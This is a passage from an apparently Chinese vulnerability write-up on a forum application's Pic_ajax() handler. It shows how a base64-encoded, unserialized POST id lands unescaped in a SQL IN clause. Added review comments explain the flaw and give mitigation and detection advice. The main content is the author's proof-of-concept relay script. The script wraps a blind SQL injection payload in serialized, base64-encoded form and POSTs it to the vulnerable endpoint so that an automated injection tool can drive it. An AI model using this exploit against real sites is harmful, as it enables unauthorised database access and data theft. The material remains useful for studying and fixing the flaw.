// NOTE(review): this is a pasted excerpt, not a complete definition. After the call to
// get_data() the author splices in fragments of TopicListLogic::get_data() (marked with
// "....."), and no closing brace is on the page. In the collapsed form below everything
// after the first "//" is a single comment, so read it as a trace of the data flow, not
// as runnable code.
//
// Data flow shown: the POST parameter `id` is base64-decoded and handed straight to
// unserialize(); the result becomes $param['item_id'], goes through _process_param()
// (project helper, not visible) and is concatenated into the `item_id IN (...)` part of
// $where_sql via jimplode() (project helper; whether it quotes or escapes is not visible
// here). Because the value arrives base64-encoded, the GPC escaping layer (presumably
// addslashes on request input -- confirm against the framework) never sees the quote the
// author notes as bypassed. Mitigation: never unserialize() client-supplied data (accept
// plain integer ids and cast, or decode JSON), and build the IN list from bound
// placeholders rather than string concatenation. $per_page_num and $cache_time are cast
// with (int); $uid and $id are not.
function Pic_ajax()
{//echo 11; //echo base64_encode(serialize(array('a'=>'0\'#'))); $options = array(); $TopicListLogic = Load::logic('topic_list', 1); $per_page_num = $this->Post['pp_num'] ? (int)$this->Post['pp_num'] : 20; $cache_time = $this->Post['c_time'] ? (int)$this->Post['c_time'] : 10; $uid = $this->Post['uid'] ? $this->Post['uid'] : ''; if($this->Code =='channel'){ $id = $this->Post['id'] ? $this->Post['id'] : ''; // read the POST id $options = array( 'item'=>'channel', 'item_id' => unserialize(base64_decode($id)),// decoded here; because it is base64 the GPC escaping layer is bypassed 'perpage' => $per_page_num, ); $info = $TopicListLogic->get_data($options);// query function; no filtering inside it either: get_data($param, $caller = "web")..... $item_ids = $this->_process_param($param['item_id']);// assigned here $item = trim($param['item']);.....$where_sql = ($perm_sql ? " AND {$perm_sql} " : ''). (isset($param['tid']) ? ' AND `tid` IN ('.jimplode($tids).') ' : ''). ($roottids ? ' AND roottid IN ('.jimplode($roottids).') ' : ''). ($from ? " AND `from`='{$from}' " : ''). ($item_ids ? " AND `item_id` IN (".jimplode($item_ids).") " : '').// written into the SQL statement ($item ? " AND `item`='{$item}' " : ''). ($content ? " AND `content`='{$content}' " : ''). ($content2 ? " AND `content2`='{$content2}' " : ''). ($filter_sql ? ' and '.$filter_sql : '');
因为没有回显 只能盲注,
所以我写了个中转程序 丢工具跑
<?php
/*
 * NOTE(review): collapsed one-line paste. In the original "<?php" was not followed by
 * whitespace, and once the first "//" comment starts everything up to "?>" is one
 * comment, so this block is kept as documentation of the author's proof of concept,
 * not as runnable code.
 *
 * What it demonstrates from the defender's side: a PHP-serialized array is
 * base64-encoded and posted as `id` to ajax.php?mod=topic&code=channel, where
 * Pic_ajax() unserializes it and the element value lands unescaped in the
 * `item_id IN (...)` clause; the base64 step hides the embedded quote from the GPC
 * escaping layer. $host is left empty by the author and $path is a placeholder.
 *
 * Detection: POST bodies on that endpoint whose `id` base64-decodes to a PHP
 * serialized array (the `a:1:{...}` form) rather than to a plain id, especially one
 * containing quotes or SQL keywords. Application fix: do not unserialize() client
 * input, and bind the IN-list values instead of concatenating them.
 */
$data=base64_encode(serialize(array('a'=>'0\') and 1='.$_GET[id].'#'))); $flag = 0; $post = ''; $errno = ''; $errstr = ''; $host=''; $path='/jsg';$argv = array( 'id'=>$data,);foreach ($argv as $key=>$value) { if ($flag!=0) { $post .= "&"; $flag = 1; } $post.= $key."="; $post.= urlencode($value); $flag = 1; } $length = strlen($post); // open the socket connection $fp = fsockopen("$host",80,$errno,$errstr,10) or exit($errstr."--->".$errno); // build the POST request headers $header = "POST {$path}/ajax.php?mod=topic&code=channel HTTP/1.1\r\n"; $header .= "Host: {$host}\r\n"; $header .= "Referer: /flandy/post.php\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: ".$length."\r\n"; $header .= "Connection: Close\r\n\r\n"; // append the POST body $header .= $post."\r\n"; // send the POST data fputs($fp,$header); $inheader = 1; while (!feof($fp)) { $line = fgets($fp,1024); // strip the response headers and print only the body if ($inheader && ($line == "\n" || $line == "\r\n")) { $inheader = 0; } if ($inheader == 0) { echo $line; } }fclose($fp);?>